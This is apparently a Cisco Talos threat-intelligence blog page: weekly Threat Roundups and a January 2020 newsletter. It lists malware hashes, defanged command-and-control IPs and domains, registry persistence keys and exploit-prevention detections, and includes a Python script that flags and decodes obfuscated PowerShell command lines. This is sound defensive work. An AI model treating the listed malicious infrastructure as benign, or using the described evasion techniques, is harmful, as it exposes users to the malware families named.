362ec0bc0738f083dcdbf9472ebf4e6227b33d093c9dacf1093607fa3b53ea01 38c56bc6885e546caab8faa8f9b75a6b1d82a60f686038ccaf72f148187fb1ee 3baa2fb31a69683a134a24d5a5a05aa1619ce65ba9811e34d254a5efd708580c 42ee0201d3a74bf465daef9178042cc7fb28bab5b932e6d7a865cbc11fce6c94 472736830d9114c83bad680bc95c138d3951213d1429e314749b18083ac5cdf2 4d583b00c74ef261c7c20e53563b521ddda7b85bf5b1ac98463af0c6488a55d0 54b3c135aa1fe9b870209d36e286df1d7dc4e6182b664285f3564c573dbbdc89
*See JSON for more IOCs

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | This has coverage

Screenshots of Detection (images not reproduced): AMP, ThreatGrid



Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
CVE-2019-0708 detected - (8483)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Atom Bombing code injection technique detected - (795)
A process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shellcode as a global Atom, then accessing it through an Asynchronous Procedure Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well.
Excessively long PowerShell command detected - (576)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
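The heuristic described above is easy to reproduce against process-creation telemetry. The following is an added example (not Talos code or AMP's detection logic): it scans a constructed set of process-creation events in an assumed key="value" line format, flags PowerShell command lines that exceed an assumed length threshold, and also flags and decodes Base64 arguments passed with any prefix of -EncodedCommand, so an analyst can read what the obfuscated script actually does. The log format, the field names and the threshold are all assumptions for this example.

```python
"""Flag excessively long or Base64-encoded PowerShell command lines.

Added example, not Talos code. Input is a constructed list of process-creation
events in an assumed key="value" line format; thresholds are assumptions.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Assumed heuristic threshold for "excessively long" (characters of command line).
LENGTH_THRESHOLD = 1000
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# key="value" pairs of the assumed log format.
FIELD_RE = re.compile(r'(\w+)="([^"]*)"')


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample events (not real telemetry). Line 3 carries a long encoded
# script; line 4 a short encoded one; lines 1 and 2 are benign.
SAMPLE_LOG = [
    'ts="2020-01-30T10:00:01Z" image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'cmdline="powershell.exe -NoProfile -Command Get-Date"',
    'ts="2020-01-30T10:00:02Z" image="C:\\Windows\\System32\\svchost.exe" cmdline="svchost.exe -k netsvcs"',
    'ts="2020-01-30T10:00:03Z" image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'cmdline="powershell.exe -w hidden -nop -EncodedCommand '
    + encode_ps("$x = '" + "A" * 600 + "'; Write-Output $x") + '"',
    'ts="2020-01-30T10:00:04Z" image="C:\\Program Files\\PowerShell\\7\\pwsh.exe" '
    'cmdline="pwsh.exe -enc ' + encode_ps("Write-Output 'hello'") + '"',
]


@dataclass
class Finding:
    line_no: int
    image: str
    cmdline_length: int
    reasons: List[str]
    decoded: Optional[str] = None


def parse_event(line: str) -> dict:
    """Turn one key="value" log line into a dict (assumed format)."""
    return dict(FIELD_RE.findall(line))


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument, or None if absent/invalid."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16le", errors="replace")


def inspect_event(line_no: int, event: dict) -> Optional[Finding]:
    """Apply the two heuristics to a single process-creation event."""
    image = event.get("image", "")
    cmdline = event.get("cmdline", "")
    basename = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if basename not in POWERSHELL_IMAGES:
        return None
    reasons = []
    if len(cmdline) > LENGTH_THRESHOLD:
        reasons.append(f"command line of {len(cmdline)} chars exceeds {LENGTH_THRESHOLD}")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("Base64-encoded command (-EncodedCommand) present")
    if not reasons:
        return None
    return Finding(line_no, basename, len(cmdline), reasons, decoded)


def scan(lines) -> List[Finding]:
    """Run the heuristics over every event; returns findings in log order."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        finding = inspect_event(line_no, parse_event(line))
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.image} ({f.cmdline_length} chars) - {'; '.join(f.reasons)}")
        if f.decoded is not None:
            print("  decoded:", f.decoded[:60])
```

The length check alone would miss line 4, which is short but still hides its script; decoding the argument is what makes the alert reviewable. In real telemetry (Sysmon event 1, Windows 4688 with command-line auditing enabled) the same two checks apply, but the threshold should be tuned against the environment's own baseline of legitimate long PowerShell invocations, such as management agents.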
Process hollowing detected - (288)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then creates a child process but, before the child begins executing, clears the child's memory and fills it with the unpacked code from the parent instead.
Kovter injection detected - (264)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Gamarue malware detected - (193)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Installcore adware detected - (90)
InstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Dealply adware detected - (61)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Reverse tcp payload detected - (13)
An exploit payload intended to connect back to an attacker-controlled host using TCP has been detected.
WinExec payload detected - (13)
An exploit payload intended to execute commands on an attacker-controlled host using WinExec has been detected.

Threat Source newsletter (Jan. 30, 2020)


Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

Be sure to pay close attention Tuesday for some changes we have coming to Snort.org. We’ll spare you the details for now, but please bear with us if the search function isn’t working correctly for you or you see anything else wonky on the site.

And, as always, we have the latest Threat Roundup where we go through the top threats we saw — and blocked — over the past week.

Upcoming public engagements

Event: A World of Threats: When DNS becomes the new weapon for governments at Swiss Cyber Security Days 
Location: Forum Fribourg, Granges-Paccot, Switzerland
Date: Feb. 12 - 13
Speakers: Paul Rascagnères
Synopsis: In this presentation, Paul will present two threat actors Cisco Talos has been tracking who are manipulating the DNS system. On Jan. 22, 2019, the U.S. DHS published a directive concerning this attack vector. We will present the timeline for these events and their technical details. One of the actors is behind the campaign we named “Sea Turtle.” This actor is more advanced and more aggressive than others we’ve observed in the past. They do not hesitate to directly target registrars and one registry. The talk will break down these two actors and the methodology used to target the victims.

Cyber Security Week in Review

  • State-sponsored actors linked to Turkey are believed to be behind a recent wave of cyber attacks targeting governments in the Middle East and Asia. The attackers are using a technique called DNS hijacking that shows similarities to the Sea Turtle actor Cisco Talos discovered last year. 
  • Facebook executives backed the security of its WhatsApp messaging software, saying it could not have been at fault for the hacking of Amazon CEO Jeff Bezos’ phone. Reports state Bezos was sent a malicious video through WhatsApp and opened it, leading to the installation of spyware. However, Facebook laid the blame at the feet of Apple and iOS’ security. 
  • The Bezos incident has led to many wealthy individuals reaching out to cyber security vendors for private assistance with security. For example, one group is working on an information-sharing platform for cyber attacks targeting members of royal families across the globe. 
  • Dozens of United Nations servers and user accounts were breached during an August cyber attack, according to new leaked reports. Staff members working in the UN’s Geneva, Switzerland office were reportedly told to change their passwords but were not made aware of the breach. 
  • The Japanese government adopted a series of new policies this week designed to protect government services from a cyber attack during the upcoming Summer Olympics. A special panel called on infrastructure and public transportation services to investigate any potential vulnerabilities in their systems due to the use of internet-of-things devices, and report those flaws immediately to an administrator. 
  • Cisco launched a new security architecture platform for IoT devices this week. Cisco Cyber Vision provides users with software and services backed by Talos’ intelligence to identify threats and vulnerabilities in IoT assets in real-time. 
  • Facebook agreed to pay $550 million as part of a settlement of a class-action lawsuit in Illinois. The suit alleged Facebook violated a state law by using facial recognition technology to auto-tag users in photos without obtaining their consent. 
  • The actor behind the Maze ransomware dumped a large amount of victim data online this week, including information from an Ohio community college and a grocery store chain in Michigan. Administrators of Maze’s website said in a message that they were sparing recent victim Parkland, Florida, but still leaked some data to prove that they were hacked. 
  • The latest security update to iOS allows users to disable a location-tracking feature used by many apps. The latest patches also fixed a critical remote code execution vulnerability in the WebKit browsing engine. 

Notable recent security issues

Title: Cisco urging users to update Firepower Management Center immediately to fix severe bug
Description: Cisco disclosed a high-severity vulnerability in its Firepower Management Center last week that could allow an attacker to bypass the usual authentication steps. The vulnerability — which was assigned a 9.8 severity score out of 10 — exists in the way Firepower handles LDAP authentication responses from an external authentication server. An attacker could exploit this flaw by sending a specially crafted HTTP request to the device. Users are also encouraged to turn off LDAP configuration on their devices. Cisco also disclosed seven high-severity flaws and 19 medium-severity security issues in some of its other products, including Smart Software Manager.
Snort SIDs: 52627-52632, 52641-52646

Title: Exploitation of Citrix vulnerability spikes after POC released, patches followed
Description: Citrix rushed out a patch for its Application Delivery Controller (ADC) and Citrix Gateway products after proof of concept code leaked for a major vulnerability. The company first disclosed CVE-2019-19781 in December, saying a patch was forthcoming. But security researchers have noticed an uptick in exploitation attacks, forcing Citrix to move up its timeline.
Snort SIDs: 52620

Most prevalent malware files this week

SHA 256: 85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5
MD5: 8c80dd97c37525927c1e549cb59bcbf3
Typical Filename: eternalblue-2.2.0.exe
Claimed Product: N/A
Detection Name: W32.85B936960F.5A5226262.auto.Talos

SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
MD5: 47b97de62ae8b2b927542aa5d7f3c858
Typical Filename: qmreportupload.exe
Claimed Product: qmreportupload
Detection Name: Win.Trojan.Generic::in10.talos

SHA 256: c0cdd2a671195915d9ffb5c9533337db935e0cc2f4d7563864ea75c21ead3f94 
MD5: 7c38a43d2ed9af80932749f6e80fea6f
Typical Filename: xme64-520.exe
Claimed Product: N/A 
Detection Name: PUA.Win.File.Coinminer::1201

SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f
MD5: e2ea315d9a83e7577053f52c974f6a5a
Typical Filename: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f
Claimed Product: N/A
Detection Name: W32.AgentWDCR:Gen.21gn.1201

SHA 256: d91abcd024d4172fadc5aa82750a18796a549207b76f624b8a9d165459379258 
MD5: a917d39a8ef125300f2f38ff1d1ab0db
Typical Filename: FFChromeSetters
Claimed Product: N/A
Detection Name: PUA.Osx.Adware.Macsearch::agent.tht.talos

Keep up with all things Talos by following us on Twitter. Snort, ClamAV and Immunet also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast here (as well as on your favorite podcast app). And, if you’re not already, you can also subscribe to the weekly Threat Source newsletter here.

Threat Roundup for January 24 to January 31

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 24 and Jan. 31. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.


For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.
The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
Doc.Downloader.Emotet-7561073-0 | Downloader | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Ransomware.TeslaCrypt-7561199-1 | Ransomware | TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the ransom, and eventually, the malware developers released the master key, allowing all encrypted files to be recovered easily.
Win.Malware.Cerber-7561026-0 | Malware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns other file extensions are used.
Win.Packed.njRAT-7561028-1 | Packed | njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. njRAT was developed by the Sparclyheason group. Some of the largest attacks using this malware date back to 2014.
Win.Packed.Kuluoz-7561668-1 | Packed | Kuluoz, sometimes known as "Asprox," is a modular remote access trojan that is also known to download and execute follow-on malware, such as fake antivirus software. Kuluoz is often delivered via spam emails pretending to be shipment delivery notifications or flight booking confirmations.
Win.Trojan.SmokeLoader-7562031-1 | Trojan | SmokeLoader is malware primarily used to download and execute additional malware. Read more about this threat on our blog at https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html.
Win.Malware.Nymaim-7565328-1 | Malware | Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to for additional payloads.
Win.Packed.ZBot-7563206-1 | Packed | Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods like key-logging and form-grabbing.
PUA.Win.File.Dealply-7563212-0 | File | DealPly is an adware program that installs an add-on for web browsers and displays malicious ads.

Threat Breakdown

Doc.Downloader.Emotet-7561073-0

Indicators of Compromise

Registry Keys | Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID 5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID
Value Name: Type
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID
Value Name: Start
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID
Value Name: ErrorControl
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID
Value Name: ImagePath
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID
Value Name: DisplayName
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID
Value Name: WOW64
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID
Value Name: ObjectName
5
Mutexes | Occurrences
Global\I98B68E3C5
Global\M98B68E3C5
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
100[.]98[.]237[.]17915
100[.]100[.]159[.]9315
100[.]67[.]234[.]6215
100[.]121[.]59[.]23315
100[.]105[.]91[.]14515
186[.]138[.]186[.]745
35[.]203[.]98[.]505
35[.]214[.]151[.]755
173[.]194[.]205[.]108/313
51[.]77[.]113[.]1003
190[.]24[.]243[.]1863
176[.]9[.]47[.]532
193[.]70[.]18[.]1442
17[.]36[.]205[.]742
74[.]202[.]142[.]712
86[.]96[.]229[.]292
74[.]202[.]142[.]332
200[.]44[.]32[.]432
74[.]202[.]142[.]512
172[.]217[.]6[.]2112
196[.]43[.]2[.]1422
123[.]58[.]177[.]2392
74[.]202[.]142[.]252
94[.]23[.]252[.]1812
185[.]224[.]136[.]62
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
cliniquefranceville[.]net20
institutpediatriesociale[.]com20
cool-game[.]info15
abakonferans[.]org15
cnarr-tchad[.]org15
imail[.]dahnaylogix[.]com2
smtp[.]prodigy[.]net[.]mx2
smtp[.]amilcargo[.]com2
smtp[.]infinitummail[.]com2
mail[.]cantv[.]net2
smtp[.]alestraune[.]net[.]mx2
smtp[.]saix[.]net2
smtp[.]dsl[.]telkomsa[.]net2
gwsmtp[.]lgdisplay[.]com2
smtp[.]pangia[.]biz2
mail[.]suntakpcb[.]com2
smtp[.]grupobiblioteca[.]es2
mail[.]1und1[.]de1
smtp[.]mail[.]pjud1
mail[.]ofsnt[.]com1
smtp[.]svacv[.]es1
smtp[.]roteisa[.]es1
mail[.]ebrou[.]az1
mail[.]assets[.]cl1
hotelancor[.]com1
*See JSON for more IOCs
Files and/or directories created | Occurrences
%HOMEPATH%\976.exe20
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp17
%TEMP%\tst7C.tmp1
%TEMP%\tstBC.tmp1
%TEMP%\tstE.tmp1

File Hashes

020514ef776f7380cafd8d2999591c75e0d476fc139450d9ac6fdfe09dd7ae87 0b77b17216fc7fb3b5de978762f07a063f722709597d0444aa2625123b8925a8 25efcc40c30bdfc1415f61c5fa2da3a569c7f4a511933bb0b898292367ca6804 2ef37c6a7f53e69a4e81613d72c21e1bc4413d4c3ebfbdb59f4c5a43b7233ae2 339e0f2df55ba72558ab93082fbb5ef218fe8527611c2c1961a4506d7c6521c4 44713e481564f2ce7a930e43bcdda80390718b92301f85cb575098959de0f6e1 44b91893a8d2d4df847664829c426f8fa0f1f3b565b0614bcf958e18795bf144 44bcf15f4888850c235f6e5e7b88bb357a3be71e4b8b22cf9cbaa7ecadbce81c 52c9a08e9df80b7b3ee5dcba625f097da1ad214cad2fb488dd4ff5296f598a4d 544b49bce1aeac4879cdcd5526cab45257ada596d9a32b3cbd254b7cb5bab381 6591f298762dac4578f9a738d736e65002adb412139af02c8cdf129ea1eb96ad 6cfb6058d1b0f8aa7927a40680c7fcd88e0c3f67cdfc2b271af7823dd89754a3 70084c2ceb78bd84337fbbfdb4765d5cfcf58a003b9d39b07c4e1ca9e7e1291d 7d6b5fa35c763390dc6187b13dae9d0248b6adacdd1b3ecd57dabd29e6aeca22 b072a08b5c35f8fb107b90ee815584ac4f7b24bd6ae30a803717f1f3fdfbeaea ca7b1a3d7db2feeb5548928ff6adb85fdb993b11795f88fed56ec7649beef850 d4b2aaebb6b4c3413610303cd78a4c7a3c57d6d269e775421881f48d7e37b898 d97abe68b3f17ac6ed03f44542568c5fc3f1586ff71a618202a6d045ed296ccf f44dadeff2a79d2ce69d0e7f8c63b7fac1bd972306dc7f803440a6378b9af58c fa60f451bb2be89d13963f75bcfc165868a5fa32d9752debbf2f077916884ac5

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection (images not reproduced): AMP, ThreatGrid, Umbrella



Win.Ransomware.TeslaCrypt-7561199-1

Indicators of Compromise

Registry Keys | Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLinkedConnections
21
<HKCU>\SOFTWARE\XXXSYS 21
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
Value Name: CheckSetting
21
<HKCU>\SOFTWARE\XXXSYS
Value Name: ID
21
<HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'> 21
<HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'>
Value Name: data
21
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
Value Name: Blob
20
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: clycoowjblev
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: xcdjaxwnjnyv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: kdkrjkoxcoox
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: jylmwtguxgkt
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ookfknruoagc
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: kjayrvnavhux
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: xlfrocgqtuck
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: rjopbftidbxn
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: untudrlkcqaf
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: exoxvooruudo
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: itbqxmjmhgli
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ngtpiwrksqfm
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ajcdjvtakwtb
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: nhflhnkqeiix
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: sllccxaietxc
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: tauqjbughujc
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: pdfnqsbitrak
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: awjcujlsmtrl
1
Mutexes | Occurrences
ityeofm9234-2342321
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
204[.]11[.]56[.]4821
109[.]73[.]238[.]24521
85[.]128[.]188[.]13821
162[.]241[.]224[.]20321
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
en[.]wikipedia[.]org21
www[.]torproject[.]org21
tt54rfdjhb34rfbnknaerg[.]milerteddy[.]com21
gwe32fdr74bhfsyujb34gfszfv[.]zatcurr[.]com21
tes543berda73i48fsdfsd[.]keratadze[.]at21
music[.]mbsaeger[.]com21
surrogacyandadoption[.]com21
imagescroll[.]com21
worldisonefamily[.]info21
biocarbon[.]com[.]ec21
stacon[.]eu21
Files and/or directories created | Occurrences
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I0ZU5JT.txt21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I478AKJ.txt21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I4FI238.txt21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I4FKVBH.txt21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I4QK3KJ.txt21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I5QX7W9.txt21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I77RW1L.txt21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I7J37KF.txt21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I9NSD58.txt21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IANXEE8.txt21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IC5NB1M.txt21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$ID60W3E.txt21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IIUTK07.txt21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IJE160U.txt21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IKAVPAE.txt21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IL2NS3P.txt21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$INKC8CM.txt21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IP8M1EE.txt21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IPDP9E0.txt21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$ISIYA4I.txt21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IV54ALI.txt21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IWK2JPN.txt21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IWYYKMD.txt21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IXC3P46.txt21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IZ7KADN.txt21
*See JSON for more IOCs

File Hashes

0bdadbb588f8cfc714bec1feb439cd5e06ebbfe33a1cb5676faad4d85304dd0b 11a166c4e1ecbe40cfc39cc03c57aafe2f812f2187a0a0d1e27c03ac932c869c 23d00f9302a58aa9903bafc850ed358fab58eb2ef82b8aa07515c22a558d23b7 335db66a2abb1f82bd92f5b6cd74722b9d5cf209beac6dcb2eefde17603d6a99 42b4d5ce541c8784936ece2082690368223730d112f108aa8d810192c54455d9 50e2f2c53166d6cb2466aa679a2917c71c6f65eb3348d350d2e38b3aeb738ddd 6d3e58844146e35ef586f8ec5b1d470a95cf360578e1d9c8aa9e012a736dd8f3 7edeacf55c94647b6826b71e08517702712d11ac41e7e5f14957812d1c9492a5 921ebcefaff3b70bf0cdd963a1442b172ac92872d4fcf757594a5998c49404cc 9482d8782e4cdefabd0d2e14645924fa508b4d49173861360db2d3d8099b713d 9d9d7709dcb74cbb2715375e4eea839263b1dd497bb27a3c8a6ada0c10aca1b3 9f7a453c5814a6ad35b0c227e97b8a1635e9b75d779c4955ff484645857f54bb b1c341cf5a3a405102e80a476986dc624e580b2d314fb80b93e967713790268a b3e5577ffd2705637a709a961aa9add3822eacd9d492b081385b1a5ac21dd34d c2d69d1b4e4977cbc97108ca5818e6fcfed517f3480b441726d6f75ac7962d84 ca6f903670b80305f33bb4b2431a8fa5c75fd59ac3938f06cf2826a98224be57 d2bcb8683986f9f06f38569c4402804cee939f56a90b40078b819e324400eb53 dec2f3b1b9b450843c1a9a4e8a368b325356f13ab1460ee3591525aae651e3d7 eb8c433674c2ae7030f0eca0bc639abb7f9dc79077cd1be6734edc31f6208a26 ef4c0401795082d5ac654c97254401435d2f844c80cdf4b9ed4ac1601ac37061 f5aae66779652b5b4abfe575f5d7f9c1f57deb2127a21e6031b01c16b148ccee

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection (images not reproduced): AMP, ThreatGrid



Win.Malware.Cerber-7561026-0

Indicators of Compromise

Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\SPEECH\VOICES
Value Name: DefaultTokenId
19
<HKCU>\SOFTWARE\MICROSOFT\SPEECH\VOICES 19
Mutexes | Occurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF}25
shell.{<random GUID>}25
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
31[.]184[.]234[.]0/2525
104[.]20[.]20[.]2518
104[.]20[.]21[.]2516
104[.]24[.]104[.]2544
104[.]24[.]105[.]2543
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
en[.]wikipedia[.]org19
www[.]collectionscanada[.]ca19
alpha3[.]suffolk[.]lib[.]ny[.]us19
www[.]archives[.]gov19
www[.]vitalrec[.]com19
www[.]cdc[.]gov19
api[.]blockcypher[.]com10
btc[.]blockr[.]io10
chain[.]so7
xxxxxxxxxxxxxxxx[.]xxxxxxxxxxxx[.]xxx2
vyohacxzoue32vvk[.]v0xn1i[.]bid1
